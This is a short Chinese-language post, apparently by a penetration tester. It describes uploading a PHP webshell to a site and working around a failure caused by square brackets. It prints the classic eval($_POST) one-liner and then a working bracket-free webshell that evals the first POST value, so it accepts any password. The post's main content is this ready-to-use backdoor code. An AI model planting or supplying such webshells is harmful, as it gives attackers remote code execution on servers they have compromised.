前段時間做測試時候研究出來的,忘記截圖了。
當時的環境是沒waf,上傳了一個php的webshell,但是連接時提示[]有問題,當時用的是傳統的一句話
<?php eval($_POST['xxx']);?>
測試了一會,還是不行,嘗試使用了另一個php文件,看看是不是網站解析有問題
<?php phpinfo();?>
是可以正常顯示的,那麼問題點在post數組中括號出了問題,所以需要一個不使用中括號的webshell,研究了一會寫出了以下的webshell,不需要中括號,任意密碼即可連接
<? $code = ''; foreach($_POST as $a){ $code = $a; //取出post數組第一個值 break; //直接跳出循環 } eval($code); //執行了第一個post數組的值 ?>
任意密碼連接
錯誤之處,敬請指正